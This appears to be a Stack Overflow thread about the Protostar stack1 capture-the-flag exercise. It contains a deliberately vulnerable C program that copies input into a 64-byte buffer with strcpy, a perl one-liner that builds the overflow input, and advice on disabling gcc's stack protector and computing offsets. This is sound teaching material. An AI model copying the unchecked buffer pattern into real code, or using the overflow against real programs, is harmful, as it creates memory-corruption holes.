I can not overflow buffer

Question

I have seen a buffer overflow code but I can not over flow it. Is there any gcc option to compile that? Or any wrong with that code.

The code is:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
     volatile int modified;
     char buffer[64];

     if(argc == 1) {
          errx(1, "please specify an argument\n");
     }

     modified = 0;
     strcpy(buffer, argv[1]);

     if(modified == 0x61626364) {
            printf("you have correctly got the variable to the right value\n");
     } else {
            printf("Try again, you got 0x%08x\n", modified);
     }
}

and I am trying to run it this way:
perl -e 'print "A"x64 . "dcba"' | xargs ./main

This is notoriously tricky to get right without looking at the generated code. What are you getting? Does the process crash? — cnicutar, Apr 29 '15 at 11:11
Overflowing `buffer` will write to the memory following it, but `modified` is probably in the memory preceding it (depending on the compiler). — interjay, Apr 29 '15 at 11:13
This is a ctf challenge [here](http://exploit-exercises.com/protostar/stack1) is the question — M.Fooladgar, Apr 29 '15 at 11:13
@ interjay: Do you know any compiler can compile this ? or gcc option ? — M.Fooladgar, Apr 29 '15 at 11:14
Maybe try to overflow it while putting it inside a struct. As far as I understand all compilers will keep the struct order since you might count on it when coding. — Erez breiman, Apr 29 '15 at 11:23
my result is `Try again, you got 0x00000000` but it must be `you have correctly got the variable to the right value\n`. I'm using debian — M.Fooladgar, Apr 29 '15 at 11:41
@M.Fooladgar How are you compiling? Have you tried feeding it a longer string? Perhaps your stack is padded. — molbdnilo, Apr 29 '15 at 11:51
@molbdnilo: yes and the result is: `*** stack smashing detected ***: ./level5 terminated`. and the compiling is easy `gcc main.c -o main`. The gcc version is `4.8.2` — M.Fooladgar, Apr 29 '15 at 11:52
@M.Fooladgar You need to disable the "smash detection". `-f-no-stack-protector`, I think. The zeros are stored between the variables so overruns can be detected. — molbdnilo, Apr 29 '15 at 11:57

score 1 · Accepted Answer · edited May 23 '17 at 12:14

You need to know

Know the stack memory layout and the address difference between the variable modified and buffer You can solve it by finding the offset between modified and buffer as (char *)&modified - (char *)buffer
Your machine endianess. I have used the stack overflow answer for this purpose

The linked demonstrates how to run the modified code that serves the purpose of determining the correct argument as well as stack smashing. The first Demo provides you with the argument that you can feed to your second Demo

I can not overflow buffer

1 Answers1